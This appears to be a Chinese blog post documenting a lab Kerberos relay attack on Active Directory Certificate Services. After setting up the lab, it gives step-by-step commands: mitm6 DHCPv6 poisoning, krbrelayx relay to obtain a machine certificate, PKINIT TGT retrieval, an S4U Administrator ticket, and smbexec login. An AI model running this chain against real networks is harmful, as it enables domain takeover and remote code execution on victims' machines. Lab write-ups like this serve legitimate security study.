kerberos中继攻击


title: kerberos中继攻击
date: 2022-03-11
tags: [‘kerberos’,‘中继’]
copyright: true

环境搭建

  1. DC ip:192.168.21.2 域名:DC.rangenet.com

  2. ADCS ip:192.168.21.3 域名:adcs.rangenet.com

  3. 一台win10域成员 ip:192.168.21.4 域名win10.rangenet.com

  4. 攻击机kali ip:192.168.21.10

DC搭建

选择一台winserver搭建adcs服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。

图形用户界面, 文本, 应用程序  描述已自动生成

安装完成之后,提升为域控制器,开始配置域控。

添加新林rangenet.com,其他默认,然后一步步到安装。

图形用户界面, 应用程序  描述已自动生成

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

ADCS搭建

选择一台winserver搭建adcs服务,这里是winserver2016。然后先将这台server加入到rangenet.com域中

社交网络的手机截图  描述已自动生成

电脑萤幕的截图  描述已自动生成

重启之后,使用域控账号登录(因为要安装ADCS服务需要登陆账号属于Enterprise Admins组,为了方便这里使用域控账号登录)

图片包含 游戏机, 自然, 夜空  描述已自动生成

下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。

服务器管理器–>添加角色和功能向导–>勾选服务器角色–>Active Director 证书服务

图形用户界面, 应用程序  描述已自动生成

图形用户界面, 应用程序  描述已自动生成

开始安装

图形用户界面, 文本, 应用程序  描述已自动生成

配置ADCS服务,只需要注意下面截图的内容,其他都是默认。

图表  低可信度描述已自动生成

图形用户界面, 文本, 应用程序  描述已自动生成

图形用户界面, 文本, 应用程序  描述已自动生成

图形用户界面, 文本, 应用程序  描述已自动生成

图形用户界面, 应用程序  描述已自动生成

访问http://localhost/certsrv出现登录框

图形用户界面, 应用程序  描述已自动生成

输入系统账号即可进入,出现下面界面,表示安装成功。

图形用户界面, 文本, 应用程序  描述已自动生成

Kerberos中继攻击

Kali中添加域控ip为dns

图形用户界面, 文本, 网站  描述已自动生成

改完后ping一下域成员,能ping通即可

文本  描述已自动生成

开始攻击

使用mitm6监听DHCPV6请求。

Mitm6 –domain rangenet.com –host-allowlist win10.rangenet.com –relay adcs.rangenet.com -v

–domain 是要攻击的域名

–host-allowlist是过滤win10这台机器的请求

–relay是转发请求的地址,这里填adcs地址

图形用户界面, 文本  描述已自动生成

使用krbrelays.py中继kerberos协议.

Pyhton3 krbrelayx.py –target http://adcs.rangenet.com/certsrv/ -ip 192.168.21.10 –victim win10.rangenet.com –adcs –template Machine

–target 是adcs证书服务的url地址

-ip是当前ip(内网中控制的机器,这里把kali直接放在内网中了)

–victim是受害者域名

图形用户界面, 文本  描述已自动生成

然后重启win10,当win10成员机获取网络连接时会发出DHCPv6请求的包,以便mitm6可以接管DHCPv6请求。

文本  描述已自动生成

Krbrelax.py成功中继到证书

文本  描述已自动生成

证书太长,把证书复制到文件里,方便复制全证书

文本  描述已自动生成

接下来使用证书去向域控获取tgt,我们使用gettgtpkinit.py来模拟这个过程。

python gettgtpkinit.py -pfx-base64 一大串证书 rangenet.com/win10$ win10.ccache

文本  描述已自动生成

报下面截图的错是因为时钟问题,DC的时间太落后了,调回正常时间即可。

图形用户界面, 文本  描述已自动生成

下面成功获取到tgt票据

文本  描述已自动生成

接下来请求管理员票据

python gets4uticket.py kerberos+ccache://rangenet.com\win10$:win10.ccache@DC主机名.rangenet.com cifs/win10.rangenet.com@rangenet.com Administrator@rangenet.com admin.ccache

DC主机名在mitm6处理的请求中可以找到

文本  描述已自动生成

图形用户界面, 文本, 网站  描述已自动生成

然后就可以使用管理员票据去登录机器了

KRB5CCNAME=admin.ccache python …/impacket/examples/smbexec.py -k rangenet.com/Administrator@win10.rangenet.com -no-pass

文本  描述已自动生成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ordar123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值